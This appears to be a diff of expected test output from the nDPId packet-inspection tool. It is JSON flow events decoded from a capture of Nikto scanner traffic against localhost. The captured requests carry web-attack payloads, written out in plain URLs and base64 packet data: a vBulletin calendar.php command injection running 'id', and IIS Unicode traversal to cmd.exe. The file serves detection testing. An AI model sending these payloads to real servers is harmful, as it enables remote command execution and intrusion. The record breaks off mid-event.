+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_packet_id":1,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277860,"pkt":"AAAAAAAAAAAAAAAACABFAAEumzdAAEAGoJB\/AAABfwAAAcdAH5B97qINvJ0VaoAYAED\/IgAAAQEICp1m\/4ydZv+MR0VUIC9jb21tdW5pdHkvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277860,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/community\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00804{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_packet_id":1,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":309,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":309,"pkt_l4_len":275,"thread_ts_msec":1576420277861,"pkt":"AAAAAAAAAAAAAAAACABFAAEntyFAAEAGhK1\/AAABfwAAAcdCH5DLAI4n0VAE+IAYAED\/GwAAAQEICp1m\/42dZv+NR0VUIC92Yi9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} +01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7580000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420277861,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_packet_id":1,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":316,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":316,"pkt_l4_len":282,"thread_ts_msec":1576420277863,"pkt":"AAAAAAAAAAAAAAAACABFAAEuCCBAAEAGM6h\/AAABfwAAAcdEH5ADaDEo9nQ1BIAYAED\/IgAAAQEICp1m\/4+dZv+PR0VUIC92YnVsbGV0aW4vY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwNDApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7580000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420277863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003040)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_packet_id":1,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277864,"pkt":"AAAAAAAAAAAAAAAACABFAADJt5hAAEAGhJR\/AAABfwAAAcdGH5CwLY6th0R7wIAYAED+vQAAAQEICp1m\/5CdZv+QR0VUIC9fdnRpX2Jpbi9mcGNvdW50LmV4ZSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDg5KQ0KDQo="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277866,"pkt":"AAAAAAAAAAAAAAAACABFAADHtYVAAEAGhql\/AAABfwAAAcdIH5CyuYy6IN3YVoAYAED+uwAAAQEICp1m\/5KdZv+SR0VUIC9zaXRlL2VnL3NvdXJjZS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxMjYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277867,"pkt":"AAAAAAAAAAAAAAAACABFAADlWiBAAEAG4fB\/AAABfwAAAcdKH5CvgWMmQVkzqIAYAED+2QAAAQEICp1m\/5OdZv+TR0VUIC9jZXJ0c3J2Ly4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}} 
+01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277870,"pkt":"AAAAAAAAAAAAAAAACABFAADwKqRAAEAGEWJ\/AAABfwAAAcdMH5CrChOaUJIGgIAYAED+5AAAAQEICp1m\/5adZv+WR0VUIC9jZ2ktYmluLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}} 
+01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 